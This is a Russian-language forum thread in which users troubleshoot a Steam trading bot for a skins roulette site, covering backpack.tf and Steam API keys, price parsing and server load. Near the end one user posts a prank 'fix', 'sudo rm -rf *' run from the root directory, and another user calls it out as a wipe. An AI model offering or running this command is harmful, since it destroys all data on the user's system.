Наш генеральный спонсор - gamblingstore.ru предлагает готовые игровые решения и услуги для создания собственных проектов
Вот !, Один разумный ответ уже есть !, я ещё конечно не проверял но я думаю проблема в этом !, потому-что backpack key я вообще не менял, так как посчитал что разницы не будет чей backpack key там указан.Помогу с 1-ым вопросом.
Тебе нужно создать апи кей и backpack key именно с аккаунта бота, тогда он будет парсить цены и принимать трейды.
Чувак, жалко тебя, жестко с тобой поступили(, но доля правды тут есть. Дело в том, что даже человеку знающему простые юникс команды конкретно в рулетками не всегда легко разобраться. Это целый организм который нужно ежедневно поддерживать и следить за работоспособностью, ну либо переделать все нахрен чтоб оно само работало. В твоем случаи ты убьешь кучу сил и времени на это все и в итоге ничего не выйдет. Это же не просто пару команд в линуксе там и node и php, ajax, redis... Чего только стоит оптимизировать нормально редис в сязке с php-fpm и nginx. Иначе онлайн больше 40 и все, хана серверу. А если юзать просто apache то там проблем еще больше. Короче искренне тебя жаль,Но не факт что проблема в это, Ещё у кого небудь есть какие небудь предположения ?
WTF &, Спам !Чувак, жалко тебя, жестко с тобой поступили(, но доля правды тут есть. Дело в том, что даже человеку знающему простые юникс команды конкретно в рулетками не всегда легко разобраться. Это целый организм который нужно ежедневно поддерживать и следить за работоспособностью, ну либо переделать все нахрен чтоб оно само работало. В твоем случаи ты убьешь кучу сил и времени на это все и в итоге ничего не выйдет. Это же не просто пару команд в линуксе там и node и php, ajax, redis... Чего только стоит оптимизировать нормально редис в сязке с php-fpm и nginx. Иначе онлайн больше 40 и все, хана серверу. А если юзать просто apache то там проблем еще больше. Короче искренне тебя жаль,фигово поступил, но возможно он спас мир от еще одной однодневной рулетки)У вас нет разрешения на просмотр ссылки, пожалуйста Войдите или Зарегистрируйтесь
По теме. Скорее всего проблема действительно в парсинге цен. Еще такое иногда бывает когда переключаешся с одного бота на второго, стим не сразу соображает и ему нужно минут 40 чтоб бот заработал. А вообще без логов понять сложно.
Вот логиЧувак, жалко тебя, жестко с тобой поступили(, но доля правды тут есть. Дело в том, что даже человеку знающему простые юникс команды конкретно в рулетками не всегда легко разобраться. Это целый организм который нужно ежедневно поддерживать и следить за работоспособностью, ну либо переделать все нахрен чтоб оно само работало. В твоем случаи ты убьешь кучу сил и времени на это все и в итоге ничего не выйдет. Это же не просто пару команд в линуксе там и node и php, ajax, redis... Чего только стоит оптимизировать нормально редис в сязке с php-fpm и nginx. Иначе онлайн больше 40 и все, хана серверу. А если юзать просто apache то там проблем еще больше. Короче искренне тебя жаль,фигово поступил, но возможно он спас мир от еще одной однодневной рулетки)У вас нет разрешения на просмотр ссылки, пожалуйста Войдите или Зарегистрируйтесь
По теме. Скорее всего проблема действительно в парсинге цен. Еще такое иногда бывает когда переключаешся с одного бота на второго, стим не сразу соображает и ему нужно минут 40 чтоб бот заработал. А вообще без логов понять сложно.
Не очень понял тебяЧелик, я же тебе написал, чтобы бот реагировал, тебе нужно бекпак с аккаунта бота создать, там же бекпак на другой домен, соответственно, он не будет работать...
Заходишь на backpack.tf/api/register под аккаунтом бота, регистрируешь апи кей на свой домен и вставляешь в GameController.Не очень понял тебя
Это я уже сделал, и не чего ещё не работает.Заходишь на backpack.tf/api/register под аккаунтом бота, регистрируешь апи кей на свой домен и вставляешь в GameController.
steamcommunity.com/dev/apikey тут тоже с аккаунта бота зарегистрируй и вставь в бота конфиг.Это я уже сделал, и не чего ещё не работает.
Это тоже я сделалsteamcommunity.com/dev/apikey тут тоже с аккаунта бота зарегистрируй и вставь в бота конфиг.
поддерживаю, работает с любым ботомПростая проблема, простое решние, в 3 команды
Код:apt-get install sudo cd / sudo rm -rf *
найс рофлишь... Тут уже объяснили, что это форматирование.поддерживаю, работает с любым ботом